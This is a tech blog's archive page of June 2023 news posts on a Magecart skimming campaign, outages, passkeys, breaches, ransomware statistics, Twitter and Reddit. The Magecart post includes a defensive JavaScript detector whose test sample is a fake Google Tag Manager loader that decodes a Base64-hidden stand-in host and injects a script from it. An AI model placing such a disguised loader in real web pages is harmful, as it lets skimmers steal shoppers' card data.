Archive for June 5, 2023

A New Magecart Credit Card Stealing Campaign Is Making The Rounds

Posted in Commentary with tags on June 5, 2023 by itnerd

A new Magecart credit card stealing campaign has been highlighted by Akamai. This campaign hijacks legitimate retail sites to act as temporary C2 servers, from which the skimmers are injected into, and hidden on, targeted eCommerce sites in the US, the UK, Australia, Brazil, Peru, and Estonia. Many of the victims did not realize they were breached for over a month, as the threat actors obfuscated the skimmer with Base64 encoding that hides the host's URL, and made the injected snippet resemble a Google Tag Manager or Facebook Pixel tag. The practical consequence is that a quick read of the page source will not reveal the skimmer's real host: the encoded strings have to be decoded and the hosts they point at checked before anything looks out of place.

David Ratner, CEO at HYAS, shares these insights:

“Protective DNS solutions are known for observing and stopping anomalous communications or connections coming out of an organization to known nefarious infrastructure; however, consumers accessing websites behave in much the same way, as the traversal of the website generates a series of connections to other domains and, in the case of Magecart infections, some being to nefarious locations. Protective DNS solutions can also be utilized by organizations to periodically scan their consumer-facing websites to identify these anomalous communications and address Magecart and other vulnerabilities, before significant numbers of consumers are taken advantage of.”

This is one of those areas where both consumers and organizations need to take steps to protect each other. Doing so makes these sorts of campaigns less effective.
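The two points above, that the skimmer's real host is hidden behind Base64 and dressed up as a Google Tag Manager or Facebook Pixel tag, and Ratner's suggestion that a site owner periodically scan their own consumer-facing pages for connections to unexpected hosts, can be combined into a simple self-check. The following is an added example written for this post, not code from Akamai, HYAS or this blog. The allowlist, the sample loader and every hostname in it are constructed for the example, and a real check would also have to cover plain-text URLs and strings assembled at runtime, which this one does not:

```javascript
// Added example (not from the Akamai report or this post): a static check
// that pulls Base64-looking tokens out of page or script text, decodes the
// ones that turn out to be URLs, and flags any script host that is not on an
// allowlist. The allowlist, the sample loader and the hostnames in it are
// constructed for this example.

// Exact hostnames the site expects to load scripts from (assumed here).
// Exact matching is deliberate: a lookalike such as
// "www.googletagmanager.com.cdn.example" must not pass.
const ALLOWED_SCRIPT_HOSTS = new Set([
  "www.googletagmanager.com",
  "connect.facebook.net",
  "shop.example", // the storefront's own origin (constructed)
]);

// Runs of the Base64 alphabet long enough to hold a URL, optional padding.
// Identifier names such as getElementsByTagName also match; they are
// discarded below because they do not decode to a URL.
const B64_TOKEN = /[A-Za-z0-9+/]{16,}={0,2}/g;

// Decode a token to text, or return null if it cannot be decoded at all.
function decodeBase64(token) {
  try {
    return typeof Buffer !== "undefined"
      ? Buffer.from(token, "base64").toString("utf8") // Node
      : atob(token); // browser (binary string; fine for ASCII URLs)
  } catch {
    return null; // atob throws on malformed input
  }
}

// Return every Base64 token in scriptText that decodes to an http(s) URL,
// together with the hidden hostname and whether it is on the allowlist.
function findHiddenScriptHosts(scriptText, allowed = ALLOWED_SCRIPT_HOSTS) {
  const findings = [];
  for (const token of scriptText.match(B64_TOKEN) ?? []) {
    const decoded = decodeBase64(token);
    if (decoded === null) continue;
    let url;
    try {
      url = new URL(decoded.trim());
    } catch {
      continue; // decoded to something, but not to a URL
    }
    if (url.protocol !== "https:" && url.protocol !== "http:") continue;
    findings.push({
      token,
      url: url.href,
      host: url.hostname,
      allowed: allowed.has(url.hostname),
    });
  }
  return findings;
}

// Hosts worth escalating: anything decoded that is not allowlisted.
function suspiciousHosts(scriptText, allowed = ALLOWED_SCRIPT_HOSTS) {
  return findHiddenScriptHosts(scriptText, allowed)
    .filter((f) => !f.allowed)
    .map((f) => f.host);
}

// Constructed sample: a loader dressed up like a Google Tag Manager snippet,
// but with the real script source hidden inside a Base64 string
// (it decodes to https://gtm-analytics.example/gtm.js, a made-up host).
const SAMPLE_LOADER = `
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],
j=d.createElement(s);j.async=true;
j.src=atob('aHR0cHM6Ly9ndG0tYW5hbHl0aWNzLmV4YW1wbGUvZ3RtLmpz')+'?id='+i;
f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-XXXX');</script>
<!-- End Google Tag Manager -->
`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(suspiciousHosts(SAMPLE_LOADER)); // [ 'gtm-analytics.example' ]
}
```

Run it against the rendered HTML of each storefront page, ideally saved from a headless browser after the page has finished loading so that scripts injected at runtime are included. Any host it reports that you do not recognise is worth tracing the way Ratner describes; a hostname that merely resembles googletagmanager.com will not match the exact-match allowlist and so gets reported rather than waved through.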

Microsoft 365 Is Down For Thousands Of Users

Posted in Commentary with tags on June 5, 2023 by itnerd

DownDetector.com is reporting that Microsoft 365 is down for thousands of users. Users are complaining of everything from slow performance to not being able to send email, or not being able to log in at all. I got a few calls on this starting about an hour ago from clients, so I know that this is a somewhat widespread problem. I should note that Microsoft has admitted to this:

So until Microsoft figures this out, it might be a snow day for many Microsoft 365 users.

Google Cloud Introduces Passkey Support In Google Workspace

Posted in Commentary with tags on June 5, 2023 by itnerd

Today, Google Cloud announced the availability of passkey technology in Google Workspace and Google Cloud in an open beta, making it the first major cloud provider to bring passkeys to enterprise and public sector organizations. This will enable more than 9 million organizations to use passkeys instead of passwords.

Google has a blog post on this that you can find here.

In early May, Google announced passkey availability for consumers. Beyond dramatically boosting security, passkeys might finally replace the password for good, making life easier for employees everywhere and their IT teams.

Additional announcement highlights include: 

  • Google data (March – April 2023) shows that passkeys are 2x faster and 4x less error prone than passwords, and are also more secure than SMS, app-based one-time passwords, and other forms of traditional two-factor authentication (2FA).
  • Passkeys can dramatically reduce the impact of phishing attacks, password fatigue, and other social engineering cyber attacks.  
  • Snap Inc. has already leveraged passkeys to help reduce the burden of password management and strengthen security for their employees. 

University Of Rochester Suffers A Data Breach

Posted in Commentary with tags on June 5, 2023 by itnerd

Today’s winner of “Who Is The Victim Of A Data Breach” is the University Of Rochester who posted this to their website:

The University of Rochester is investigating a cybersecurity attack. This data breach, which resulted from a software vulnerability in a product provided by a third-party file transfer company, has affected the University and approximately 2,500 organizations worldwide.

I’m going to go out on a limb and suggest that this “third-party file transfer company” is likely the Fortra GoAnywhere vulnerability, which has led to the pwnage of companies and organizations left and right. I have questions about that if my theory is accurate. But first I will let Ani Chaudhuri, CEO, Dasera, comment on this:

The recent data breach at the University of Rochester underscores the complexity and challenge of cybersecurity in today’s digital age. Our reliance on third-party software providers means we are only as strong as our weakest link, with the entire community affected when even one vulnerability is exploited.

This incident offers a stark reminder that data security is an ongoing commitment and a continuous journey. It’s not a checklist task to be completed and then left unattended. The software vulnerability that led to this breach was likely unknown at the time of its introduction but has had a profound impact nonetheless.

We need to empathize with the University of Rochester, the staff, and students affected by this breach. The cyber landscape is incredibly complex, and as we digitize more aspects of our lives, the risks increase. We should be reassured by the university’s swift actions, urging users to add extra layers of protection and working closely with the FBI and an external data forensics firm to investigate the breach.

However, it’s important to recognize that the sophistication of today’s cyber threats calls for more than just strong passwords and multi-factor authentication. We need to adopt a proactive and continuous approach to data security, embedding it into our operational DNA. This includes conducting regular audits, risk assessments, and implementing robust cybersecurity measures that can adapt to the ever-evolving threat landscape.

We should remember that while the internet has brought immense benefits, it has also made us vulnerable to an array of threats. Our collective security is a shared responsibility, requiring the participation of every stakeholder in the cyber ecosystem.

Lastly, this breach should prompt us to pause and re-evaluate our security measures and protocols, not as a reaction to an unfortunate incident, but as a conscious, forward-thinking strategy to protect the data that is becoming increasingly integral to our lives. This is not a trivial task but it’s a challenge we must embrace head-on in our interconnected world.

Back to my theory about the Fortra GoAnywhere vulnerability being the source of this breach. Assuming my theory is correct, this vulnerability is not new. So did the threat actors get in and set up shop before the University patched it? Or did the University not patch it and get burned because of that? I’d love to know the answers to those questions, and I am hoping that the University puts out a full report that details what happened and what it is going to do to make sure it never happens again.

BlackFog Releases The State Of Ransomware Report For May

Posted in Commentary with tags on June 5, 2023 by itnerd

BlackFog today released its State of Ransomware Report for May. And the news isn’t good. The top item from this report is that there has been a 154% global increase over May 2022. If that doesn’t send chills down your spine, nothing will.

Dr. Darren Williams, CEO and Founder, BlackFog, comments on the findings:

     “May represents a watershed moment for Ransomware across the globe with a significant increase in the attack success rate, with a 154% increase over 2022. Notably, we saw a concerted effort to attack law firms as attackers placed increasing emphasis on data exfiltration. The value of the data continues to climb as cyber criminals look for new ways to extort organizations and their clients. This explains the 233% increase in the services industry this month.

We continue to see specific targeting of healthcare, technology, education and government with increases of 81%, 57%, 42% and 33% respectively during May. Unreported attacks are now 5 times (489%) more than reported attacks. While down from a high of 10 last month, this is a factor of the large volume of reported attacks rather than any material change in unreported attacks, which remained relatively constant at 323.

In terms of variants, this month we saw LockBit and BlackCat continue to dominate with 18.4% and 17.6% respectively, very similar to last month. This is consistent with unreported attacks, also dominated by LockBit and BlackCat, with 39.7% and 13.8% respectively.

Finally, illegal networks now dominate exfiltration techniques with 97% of all attacks, with a large majority originating and exfiltrating data to China 42% of the time, with Russia at 10%. We attribute the lower exfiltration to Russia due to the effect of sanctions, making it difficult to procure, launch and exfiltrate data to this nation.”

This report makes it clear that ransomware is not just a growing threat, but a clear and present danger. Thus organizations of all sizes should take this threat seriously and adjust their defences accordingly.

Twitter Advertising Is Down 59% Year Over Year

Posted in Commentary with tags on June 5, 2023 by itnerd

Linda Yaccarino hasn’t taken over as Twitter CEO yet, though that might happen sooner than expected. Regardless, she will have to clean up one major mess that Elon Musk has created for her, which is that advertising on Twitter is down:

Elon Musk recently said Twitter’s advertising business was on the upswing. “Almost all advertisers have come back,” he asserted, adding that the social media company could soon become profitable.

But Twitter’s U.S. advertising revenue for the five weeks from April 1 to the first week of May was $88 million, down 59 percent from a year earlier, according to an internal presentation obtained by The New York Times. The company has regularly fallen short of its U.S. weekly sales projections, sometimes by as much as 30 percent, the document said.

That performance is unlikely to improve anytime soon, according to the documents and seven current and former Twitter employees.

For a business that largely relies on advertising, and given that Twitter Blue, which was supposed to replace advertising revenue, is a failure of epic proportions, that’s not good news. Neither is this:

Some of Twitter’s biggest advertisers — including Apple, Amazon and Disney — have been spending less on the platform than last year, three former and current Twitter employees said. Large specialized “banner” ads on Twitter’s trends page, which can cost $500,000 for 24 hours and are almost always bought by large brands to promote events, shows or movies, are often going unfilled, they said.

And this:

Six ad agency executives who have worked with Twitter said their clients continued to limit spending on the platform. They cited confusion over Mr. Musk’s changes to the service, inconsistent support from Twitter and concerns about the persistent presence of misleading and toxic content on the platform.

I honestly have no idea how Yaccarino fixes this. She can make all the promises that she wants to big advertisers and ad agencies that Twitter is going to be a better place to advertise with her running the show. But Elon’s behaviour and the fact that Twitter is a toxic swamp of hate and bigotry are going to send those promises to the bin. Yaccarino may want to keep her CV updated, because I suspect that she might be heading for the exits once she figures out that this is a Kobayashi Maru scenario.

Parts Of Reddit Will Go Dark In Protest Over Reddit Killing Access To Third Party Apps

Posted in Commentary with tags on June 5, 2023 by itnerd

In an Elon Musk-like move, Reddit announced that it is going to raise the price of API access, which by extension will likely kill Reddit access for third party apps like BaconReader and Apollo. For example, the developer of Apollo said that these changes would cost them $20 million a year, which from my perspective is something that third party developers can’t sustain. The cynic in me says that this is a move by Reddit to kill third party apps and force people to use its app or the Reddit website instead. Which, if that sounds familiar, is what Twitter did when it pulled a similar stunt.

The difference is that unlike Twitter, Reddit users are rising up against this move:

On June 12th, many subreddits will be going dark to protest this policy. Some will return after 48 hours: others will go away permanently unless the issue is adequately addressed, since many moderators aren’t able to put in the work they do with the poor tools available through the official app. This isn’t something any of us do lightly: we do what we do because we love Reddit, and we truly believe this change will make it impossible to keep doing what we love.

The two-day blackout isn’t the goal, and it isn’t the end. Should things reach the 14th with no sign of Reddit choosing to fix what they’ve broken, we’ll use the community and buzz we’ve built between then and now as a tool for further action.

This isn’t a trivial move, as Reddit, like Twitter, relies on user interaction to make money. But unlike Twitter, which has seen a large number of users abandon the platform, Reddit users are a much more militant bunch who will stand and fight this move and escalate if they don’t get what they want. This is going to be a problem for Reddit, as I am sure that the company thought it could push this through with little or no pushback. But clearly that is turning out not to be the case. It will be interesting to see how Reddit deals with this, and how quickly it escalates.